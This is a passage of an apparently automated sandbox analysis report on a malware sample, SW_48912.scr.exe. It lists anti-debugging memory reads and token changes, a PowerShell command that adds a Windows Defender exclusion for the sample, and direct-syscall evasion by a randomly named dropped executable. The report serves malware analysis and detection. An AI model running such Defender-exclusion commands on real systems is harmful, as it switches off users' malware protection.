                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01406962 mov eax, dword ptr fs:[00000030h]5_2_01406962
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01406962 mov eax, dword ptr fs:[00000030h]5_2_01406962
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01406962 mov eax, dword ptr fs:[00000030h]5_2_01406962
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8918 mov eax, dword ptr fs:[00000030h]5_2_013D8918
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8918 mov eax, dword ptr fs:[00000030h]5_2_013D8918
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142096E mov eax, dword ptr fs:[00000030h]5_2_0142096E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142096E mov edx, dword ptr fs:[00000030h]5_2_0142096E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142096E mov eax, dword ptr fs:[00000030h]5_2_0142096E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01484978 mov eax, dword ptr fs:[00000030h]5_2_01484978
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01484978 mov eax, dword ptr fs:[00000030h]5_2_01484978
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146C97C mov eax, dword ptr fs:[00000030h]5_2_0146C97C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E908 mov eax, dword ptr fs:[00000030h]5_2_0145E908
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E908 mov eax, dword ptr fs:[00000030h]5_2_0145E908
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146C912 mov eax, dword ptr fs:[00000030h]5_2_0146C912
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146892A mov eax, dword ptr fs:[00000030h]5_2_0146892A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0147892B mov eax, dword ptr fs:[00000030h]5_2_0147892B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014769C0 mov eax, dword ptr fs:[00000030h]5_2_014769C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014149D0 mov eax, dword ptr fs:[00000030h]5_2_014149D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E09AD mov eax, dword ptr fs:[00000030h]5_2_013E09AD
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E09AD mov eax, dword ptr fs:[00000030h]5_2_013E09AD
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AA9D3 mov eax, dword ptr fs:[00000030h]5_2_014AA9D3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h]5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146E9E0 mov eax, dword ptr fs:[00000030h]5_2_0146E9E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014129F9 mov eax, dword ptr fs:[00000030h]5_2_014129F9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014129F9 mov eax, dword ptr fs:[00000030h]5_2_014129F9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA9D0 mov eax, dword ptr fs:[00000030h]5_2_013EA9D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA9D0 mov eax, dword ptr fs:[00000030h]5_2_013EA9D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA9D0 mov eax, dword ptr fs:[00000030h]5_2_013EA9D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA9D0 mov eax, dword ptr fs:[00000030h]5_2_013EA9D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA9D0 mov eax, dword ptr fs:[00000030h]5_2_013EA9D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA9D0 mov eax, dword ptr fs:[00000030h]5_2_013EA9D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014689B3 mov esi, dword ptr fs:[00000030h]5_2_014689B3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014689B3 mov eax, dword ptr fs:[00000030h]5_2_014689B3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014689B3 mov eax, dword ptr fs:[00000030h]5_2_014689B3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01410854 mov eax, dword ptr fs:[00000030h]5_2_01410854
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146E872 mov eax, dword ptr fs:[00000030h]5_2_0146E872
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146E872 mov eax, dword ptr fs:[00000030h]5_2_0146E872
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01476870 mov eax, dword ptr fs:[00000030h]5_2_01476870
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01476870 mov eax, dword ptr fs:[00000030h]5_2_01476870
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146C810 mov eax, dword ptr fs:[00000030h]5_2_0146C810
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4859 mov eax, dword ptr fs:[00000030h]5_2_013E4859
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E4859 mov eax, dword ptr fs:[00000030h]5_2_013E4859
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A830 mov eax, dword ptr fs:[00000030h]5_2_0141A830
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148483A mov eax, dword ptr fs:[00000030h]5_2_0148483A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148483A mov eax, dword ptr fs:[00000030h]5_2_0148483A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01402835 mov eax, dword ptr fs:[00000030h]5_2_01402835
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01402835 mov eax, dword ptr fs:[00000030h]5_2_01402835
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01402835 mov eax, dword ptr fs:[00000030h]5_2_01402835
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01402835 mov ecx, dword ptr fs:[00000030h]5_2_01402835
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01402835 mov eax, dword ptr fs:[00000030h]5_2_01402835
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01402835 mov eax, dword ptr fs:[00000030h]5_2_01402835
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F2840 mov ecx, dword ptr fs:[00000030h]5_2_013F2840
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E8C0 mov eax, dword ptr fs:[00000030h]5_2_0140E8C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B08C0 mov eax, dword ptr fs:[00000030h]5_2_014B08C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AA8E4 mov eax, dword ptr fs:[00000030h]5_2_014AA8E4
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C8F9 mov eax, dword ptr fs:[00000030h]5_2_0141C8F9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C8F9 mov eax, dword ptr fs:[00000030h]5_2_0141C8F9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0887 mov eax, dword ptr fs:[00000030h]5_2_013E0887
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146C89D mov eax, dword ptr fs:[00000030h]5_2_0146C89D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01494B4B mov eax, dword ptr fs:[00000030h]5_2_01494B4B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01494B4B mov eax, dword ptr fs:[00000030h]5_2_01494B4B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01476B40 mov eax, dword ptr fs:[00000030h]5_2_01476B40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01476B40 mov eax, dword ptr fs:[00000030h]5_2_01476B40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AAB40 mov eax, dword ptr fs:[00000030h]5_2_014AAB40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01488B42 mov eax, dword ptr fs:[00000030h]5_2_01488B42
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148EB50 mov eax, dword ptr fs:[00000030h]5_2_0148EB50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B2B57 mov eax, dword ptr fs:[00000030h]5_2_014B2B57
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B2B57 mov eax, dword ptr fs:[00000030h]5_2_014B2B57
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B2B57 mov eax, dword ptr fs:[00000030h]5_2_014B2B57
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B2B57 mov eax, dword ptr fs:[00000030h]5_2_014B2B57
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DCB7E mov eax, dword ptr fs:[00000030h]5_2_013DCB7E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4B00 mov eax, dword ptr fs:[00000030h]5_2_014B4B00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h]5_2_0145EB1D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140EB20 mov eax, dword ptr fs:[00000030h]5_2_0140EB20
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140EB20 mov eax, dword ptr fs:[00000030h]5_2_0140EB20
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A8B28 mov eax, dword ptr fs:[00000030h]5_2_014A8B28
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A8B28 mov eax, dword ptr fs:[00000030h]5_2_014A8B28
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8B50 mov eax, dword ptr fs:[00000030h]5_2_013D8B50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0BBE mov eax, dword ptr fs:[00000030h]5_2_013F0BBE
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0BBE mov eax, dword ptr fs:[00000030h]5_2_013F0BBE
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01400BCB mov eax, dword ptr fs:[00000030h]5_2_01400BCB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01400BCB mov eax, dword ptr fs:[00000030h]5_2_01400BCB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01400BCB mov eax, dword ptr fs:[00000030h]5_2_01400BCB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148EBD0 mov eax, dword ptr fs:[00000030h]5_2_0148EBD0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146CBF0 mov eax, dword ptr fs:[00000030h]5_2_0146CBF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140EBFC mov eax, dword ptr fs:[00000030h]5_2_0140EBFC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8BF0 mov eax, dword ptr fs:[00000030h]5_2_013E8BF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8BF0 mov eax, dword ptr fs:[00000030h]5_2_013E8BF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8BF0 mov eax, dword ptr fs:[00000030h]5_2_013E8BF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0BCD mov eax, dword ptr fs:[00000030h]5_2_013E0BCD
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0BCD mov eax, dword ptr fs:[00000030h]5_2_013E0BCD
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0BCD mov eax, dword ptr fs:[00000030h]5_2_013E0BCD
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01494BB0 mov eax, dword ptr fs:[00000030h]5_2_01494BB0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01494BB0 mov eax, dword ptr fs:[00000030h]5_2_01494BB0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148EA60 mov eax, dword ptr fs:[00000030h]5_2_0148EA60
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141CA6F mov eax, dword ptr fs:[00000030h]5_2_0141CA6F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141CA6F mov eax, dword ptr fs:[00000030h]5_2_0141CA6F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141CA6F mov eax, dword ptr fs:[00000030h]5_2_0141CA6F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145CA72 mov eax, dword ptr fs:[00000030h]5_2_0145CA72
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145CA72 mov eax, dword ptr fs:[00000030h]5_2_0145CA72
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146CA11 mov eax, dword ptr fs:[00000030h]5_2_0146CA11
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0A5B mov eax, dword ptr fs:[00000030h]5_2_013F0A5B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0A5B mov eax, dword ptr fs:[00000030h]5_2_013F0A5B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141CA24 mov eax, dword ptr fs:[00000030h]5_2_0141CA24
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140EA2E mov eax, dword ptr fs:[00000030h]5_2_0140EA2E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6A50 mov eax, dword ptr fs:[00000030h]5_2_013E6A50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6A50 mov eax, dword ptr fs:[00000030h]5_2_013E6A50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6A50 mov eax, dword ptr fs:[00000030h]5_2_013E6A50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6A50 mov eax, dword ptr fs:[00000030h]5_2_013E6A50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6A50 mov eax, dword ptr fs:[00000030h]5_2_013E6A50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6A50 mov eax, dword ptr fs:[00000030h]5_2_013E6A50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6A50 mov eax, dword ptr fs:[00000030h]5_2_013E6A50
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01404A35 mov eax, dword ptr fs:[00000030h]5_2_01404A35
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01404A35 mov eax, dword ptr fs:[00000030h]5_2_01404A35
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01436ACC mov eax, dword ptr fs:[00000030h]5_2_01436ACC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01436ACC mov eax, dword ptr fs:[00000030h]5_2_01436ACC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01436ACC mov eax, dword ptr fs:[00000030h]5_2_01436ACC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01414AD0 mov eax, dword ptr fs:[00000030h]5_2_01414AD0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01414AD0 mov eax, dword ptr fs:[00000030h]5_2_01414AD0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8AA0 mov eax, dword ptr fs:[00000030h]5_2_013E8AA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8AA0 mov eax, dword ptr fs:[00000030h]5_2_013E8AA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141AAEE mov eax, dword ptr fs:[00000030h]5_2_0141AAEE
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141AAEE mov eax, dword ptr fs:[00000030h]5_2_0141AAEE
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EEA80 mov eax, dword ptr fs:[00000030h]5_2_013EEA80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EEA80 mov eax, dword ptr fs:[00000030h]5_2_013EEA80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EEA80 mov eax, dword ptr fs:[00000030h]5_2_013EEA80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EEA80 mov eax, dword ptr fs:[00000030h]5_2_013EEA80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
